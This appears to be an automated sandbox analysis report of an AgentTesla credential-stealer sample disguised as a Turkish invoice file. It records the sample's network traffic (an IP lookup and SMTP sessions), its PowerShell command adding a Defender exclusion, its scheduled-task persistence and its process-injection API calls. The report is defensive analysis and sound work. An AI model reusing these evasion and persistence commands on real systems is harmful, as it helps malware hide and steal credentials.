0	192.168.2.4	49733	172.67.74.152	443	7048	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 13:57:23 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-09-21 13:57:23 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 13:57:23 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c6a90653cfc42ce-EWR
2024-09-21 13:57:23 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	172.67.74.152	443	7444	C:\Users\user\AppData\Roaming\cYDnGbgU.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-21 13:57:27 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-09-21 13:57:27 UTC	211	IN	HTTP/1.1 200 OK Date: Sat, 21 Sep 2024 13:57:27 GMT Content-Type: text/plain Content-Length: 11 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8c6a9080cccb41d2-EWR
2024-09-21 13:57:27 UTC	11	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Sep 21, 2024 15:57:25.879782915 CEST	587	49736	192.250.227.28	192.168.2.4	220-s1103.usc1.mysecurecloudhost.com ESMTP Exim 4.97.1 #2 Sat, 21 Sep 2024 13:57:25 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Sep 21, 2024 15:57:25.880290031 CEST	49736	587	192.168.2.4	192.250.227.28	EHLO 571345
Sep 21, 2024 15:57:26.007129908 CEST	587	49736	192.250.227.28	192.168.2.4	250-s1103.usc1.mysecurecloudhost.com Hello 571345 [8.46.123.33] 250-SIZE 104857600 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Sep 21, 2024 15:57:26.007496119 CEST	49736	587	192.168.2.4	192.250.227.28	STARTTLS
Sep 21, 2024 15:57:26.136888981 CEST	587	49736	192.250.227.28	192.168.2.4	220 TLS go ahead
Sep 21, 2024 15:57:29.649207115 CEST	587	49740	192.250.227.28	192.168.2.4	220-s1103.usc1.mysecurecloudhost.com ESMTP Exim 4.97.1 #2 Sat, 21 Sep 2024 13:57:29 +0000 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Sep 21, 2024 15:57:29.649404049 CEST	49740	587	192.168.2.4	192.250.227.28	EHLO 571345
Sep 21, 2024 15:57:29.782901049 CEST	587	49740	192.250.227.28	192.168.2.4	250-s1103.usc1.mysecurecloudhost.com Hello 571345 [8.46.123.33] 250-SIZE 104857600 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Sep 21, 2024 15:57:29.787564993 CEST	49740	587	192.168.2.4	192.250.227.28	STARTTLS
Sep 21, 2024 15:57:29.921456099 CEST	587	49740	192.250.227.28	192.168.2.4	220 TLS go ahead

Target ID:	0
Start time:	09:57:18
Start date:	21/09/2024
Path:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Imagebase:	0x210000
File size:	712'704 bytes
MD5 hash:	2E6FC928822C8F9BB49E60B32E87F1AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1756426531.00000000042A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1756426531.0000000003981000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:57:20
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:57:20
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:57:20
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\cYDnGbgU.exe"
Imagebase:	0xfa0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	09:57:20
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	09:57:20
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp38F1.tmp"
Imagebase:	0xe50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	09:57:20
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:57:21
Start date:	21/09/2024
Path:	C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\F#U0130YAT TEKL#U0130F#U0130-2400.exe"
Imagebase:	0x590000
File size:	712'704 bytes
MD5 hash:	2E6FC928822C8F9BB49E60B32E87F1AE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4148813369.00000000028AE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4148813369.0000000002884000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4148813369.00000000028C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.4148813369.00000000028B6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	09:57:21
Start date:	21/09/2024
Path:	C:\Users\user\AppData\Roaming\cYDnGbgU.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\cYDnGbgU.exe
Imagebase:	0xba0000
File size:	712'704 bytes
MD5 hash:	2E6FC928822C8F9BB49E60B32E87F1AE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1796054239.0000000004292000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 79%, ReversingLabs Detection: 79%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	09:57:23
Start date:	21/09/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	09:57:25
Start date:	21/09/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\cYDnGbgU" /XML "C:\Users\user\AppData\Local\Temp\tmp4A37.tmp"
Imagebase:	0xe50000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	09:57:25
Start date:	21/09/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	09:57:25
Start date:	21/09/2024
Path:	C:\Users\user\AppData\Roaming\cYDnGbgU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\cYDnGbgU.exe"
Imagebase:	0xef0000
File size:	712'704 bytes
MD5 hash:	2E6FC928822C8F9BB49E60B32E87F1AE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4149137493.00000000033A6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4149137493.00000000033B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4149137493.000000000339E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.4149137493.0000000003375000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	202
Total number of Limit Nodes:	15

Executed Functions

Function 06EA49F0 Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60378dd7c8f1b679d9b1dccf623617c7e62fdb9b8b652872018de9ca5e0605e
Instruction ID: 148e56cc8a4b80694a6546e7fc59b69f36a5b9e713d2bee152337b7e2cbe665a
Opcode Fuzzy Hash: e60378dd7c8f1b679d9b1dccf623617c7e62fdb9b8b652872018de9ca5e0605e
Instruction Fuzzy Hash: 63B18C70D05328CFEB54DFA5C8447EDBBB6FB49304F00A069D519AB291EBB41A46CF45

Function 06EA4A00 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69de55b8cac98430b9292faf0b9a7d3bcee88df7fe93e6a9ae6b71053fdde145
Instruction ID: e62d532e06202f9fa1cce0264ecd3716dfc601b71f9d03a8e3ae0a79c517039d
Opcode Fuzzy Hash: 69de55b8cac98430b9292faf0b9a7d3bcee88df7fe93e6a9ae6b71053fdde145
Instruction Fuzzy Hash: 10A18C70D05328CFEB54DFA5C8447EEBBF6FB49304F00A169D519AB290EBB42A468F44

Function 06EA8D28 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76cda1ad11875eba980c5a9d15a5f3edb945ccb20d1a3ea8dacf2dfe2de1adbe
Instruction ID: ad1b6e263e76cb2efb3c392f351eddd2186caada1456a3a7a747018d7f6a89bc
Opcode Fuzzy Hash: 76cda1ad11875eba980c5a9d15a5f3edb945ccb20d1a3ea8dacf2dfe2de1adbe
Instruction Fuzzy Hash: E821DAB0D057189BEB58CFA6C9543DEBBB6AF89300F04D06AD409AA265DB741946CF90

Function 00A0D369 Relevance: 6.1, APIs: 4, Instructions: 131
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A0D3F6
GetCurrentThread.KERNEL32 ref: 00A0D433
GetCurrentProcess.KERNEL32 ref: 00A0D470
GetCurrentThreadId.KERNEL32 ref: 00A0D4C9

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9304632af50579a3a4516d21a82b9e98c97ce14b3ed12f544b7ad4a07ff40cd2
Instruction ID: b46fa91759ceca3ed48d6c8c35bbfa74cb7601afa2afb95862a32b19635054dc
Opcode Fuzzy Hash: 9304632af50579a3a4516d21a82b9e98c97ce14b3ed12f544b7ad4a07ff40cd2
Instruction Fuzzy Hash: 035166B09003498FDB18DFA9E548BDEBBF1FF88315F208459E00AA73A1D7756944CB25

Function 00A0D378 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00A0D3F6
GetCurrentThread.KERNEL32 ref: 00A0D433
GetCurrentProcess.KERNEL32 ref: 00A0D470
GetCurrentThreadId.KERNEL32 ref: 00A0D4C9

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 892c902a72d7bbc10822fc9962b49a53c011e6e56502b5376fb5afcba7938772
Instruction ID: 747d3efb97f1df9a23654ddeac50c87c9e0a3c618003fab427d9e357bf2ca02b
Opcode Fuzzy Hash: 892c902a72d7bbc10822fc9962b49a53c011e6e56502b5376fb5afcba7938772
Instruction Fuzzy Hash: 295145B09003498FDB58DFAAD548BDEBBF1FF88315F208459E009A73A0DB756984CB65

Function 06EAE9FC Relevance: 1.7, APIs: 1, Instructions: 248
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06EAEC3E

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 0c17fb7ac4807cfef0e7aee1c927e43151265427f91f8fdfb8b27c893522d162
Instruction ID: 7c87a44f9d13552a46bcd97099dc49af35a7ccaf4aa59ba40dab87167b3687c2
Opcode Fuzzy Hash: 0c17fb7ac4807cfef0e7aee1c927e43151265427f91f8fdfb8b27c893522d162
Instruction Fuzzy Hash: 06A17C71D003198FDB60CF68C845BEEBBB2BF48314F148569D809AB280DB74A985DF91

Function 06EAEA08 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06EAEC3E

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 1eb1ff174f614dcfb5a6533ccc6af02ef2aa8c8c2c91ef91db271613f063cd14
Instruction ID: c59f2b692af0fe59af620cb8d6b9d646a4bdc03cdadc445af8e982616203da06
Opcode Fuzzy Hash: 1eb1ff174f614dcfb5a6533ccc6af02ef2aa8c8c2c91ef91db271613f063cd14
Instruction Fuzzy Hash: B2916A71D003198FEF64CF68C845BEEBBB2BF48314F148569D809AB284DB74A985DF91

Function 00A0ACE8 Relevance: 1.7, APIs: 1, Instructions: 199
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 00A0AF3E

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 2ab484bd7a92b38c8309c980175fd990f7dfecbba10915a6c3dae9929f14e9d3
Instruction ID: edfad6a86860e149c9ea49860d6d29600ca0b46a144d74c4c36ebcd433aa8b20
Opcode Fuzzy Hash: 2ab484bd7a92b38c8309c980175fd990f7dfecbba10915a6c3dae9929f14e9d3
Instruction Fuzzy Hash: 17815970A00B098FDB24DF29E45575ABBF1FF98300F10892DE48ADBA90DB35E945CB91

Function 00A058ED Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A059A9

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 2110f7b768799cfe47df89506c105c0c96cee5ddf83b9b93164ecd11a28813d4
Instruction ID: 2a00f38640efd1fbe86e4d645a65cfc3b08d0f29e33759c6c11561a627e15060
Opcode Fuzzy Hash: 2110f7b768799cfe47df89506c105c0c96cee5ddf83b9b93164ecd11a28813d4
Instruction Fuzzy Hash: 6641E2B0C0071DCEDB24CFA9C8846DEBBB2BF49314F20815AD409AB251DB756A46CF51

Function 00A044F0 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00A059A9

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: a6db632d385d5a35273338454bb5d5da01b4785d125049aeba7047883bb8212c
Instruction ID: 7ccc8cb5159629d8682cffaad161d4c0cf7eb285675030acbd8fc526ff441c66
Opcode Fuzzy Hash: a6db632d385d5a35273338454bb5d5da01b4785d125049aeba7047883bb8212c
Instruction Fuzzy Hash: 454101B0C0071DCBDB24CFA9C844B9EBBF1BF48304F20806AD409AB251DB756945CF91

Function 06EAE778 Relevance: 1.6, APIs: 1, Instructions: 74
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06EAE810

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8e5b7ccdc82f2ad1abfaee8575bdc0d0f616af458d7e2c95e3503aa3bde97d5f
Instruction ID: 2e29091d1055d3b8648284e8dcc09fae1308e88eaca484f05161a1328fe2661d
Opcode Fuzzy Hash: 8e5b7ccdc82f2ad1abfaee8575bdc0d0f616af458d7e2c95e3503aa3bde97d5f
Instruction Fuzzy Hash: BD2137759003499FCB10DFA9C885BDEBBF5FF48320F148429E558A7241C778A944DBA1

Function 06EAE780 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06EAE810

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 48834c063fa717f71609d04f543a1ab8aed29865e501e8e87703dfba4f091bcc
Instruction ID: a0d099be814fd0d82a4de2068b338bfce6a29162149fda3e022d79b0ac49aa10
Opcode Fuzzy Hash: 48834c063fa717f71609d04f543a1ab8aed29865e501e8e87703dfba4f091bcc
Instruction Fuzzy Hash: 552146B1D003099FCB10CFAAC885BDEBBF5FF48310F108429E918A7240C778A944DBA0

Function 06EAE868 Relevance: 1.6, APIs: 1, Instructions: 67COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06EAE8F0

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: e07e4cf81a9968885bd4e6b93b9098621c162788478982fc03c93a40207a3bd7
Instruction ID: d5f21f158afe595d6085328e6ea5b95c86827ed0d7fcd8578f275b191818dd30
Opcode Fuzzy Hash: e07e4cf81a9968885bd4e6b93b9098621c162788478982fc03c93a40207a3bd7
Instruction Fuzzy Hash: AE2124B18003499FCB10DFAAC885AEEFBF5FF48320F548429E559A7241C778A954DBA1

Function 06EAE1A8 Relevance: 1.6, APIs: 1, Instructions: 66threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EAE22E

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: da8dc87c1f93568986863c50aa76ac7ab8e7347c861a0046db56d9315fd0ee43
Instruction ID: 1d896f06d43fa8cbdb382e42984d069629595201984c6c14eb21946965ce77ef
Opcode Fuzzy Hash: da8dc87c1f93568986863c50aa76ac7ab8e7347c861a0046db56d9315fd0ee43
Instruction Fuzzy Hash: 9F214971D003099FDB10DFAAC885BEEBBF4EF48324F548429D459A7280CB78A945CFA5

Function 00A0D5B8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00A0D647

Memory Dump Source

Source File: 00000000.00000002.1751648759.0000000000A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a00000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 0889b9a91328f6a9b6538b1ddeb57b0c5d4d91256543be61a59a2b7a4e562fc4
Instruction ID: e0bf942266731de70d2f4bcc0ec248772b927264f32fb72febfe5b9eca2eb7c6
Opcode Fuzzy Hash: 0889b9a91328f6a9b6538b1ddeb57b0c5d4d91256543be61a59a2b7a4e562fc4
Instruction Fuzzy Hash: BC2114B5800248DFDB10CFAAD884AEEBFF5FB48320F14841AE958A3350C379A944DF65

Function 06EAE1B0 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06EAE22E

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 3e5df1b90e9196617665f9bb255ab239a74c276472dcc27554bbc81221c19eda
Instruction ID: 06b681af5995be933f34dc2f30efb4939dbde2712971bd06b9a0b29e3bc8bcf7
Opcode Fuzzy Hash: 3e5df1b90e9196617665f9bb255ab239a74c276472dcc27554bbc81221c19eda
Instruction Fuzzy Hash: 43214971D003098FDB10DFAAC4857EEBBF4EF48324F148429D459A7240CB78A945CFA5

Function 06EAE870 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06EAE8F0

Memory Dump Source

Source File: 00000000.00000002.1758962545.0000000006EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ea0000_F#U0130YAT TEKL#U0130F#U0130-2400.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 91686977ed22c7364cd748aa954841f8a7301cc7680519f5ba0c6511e7dc4fa5
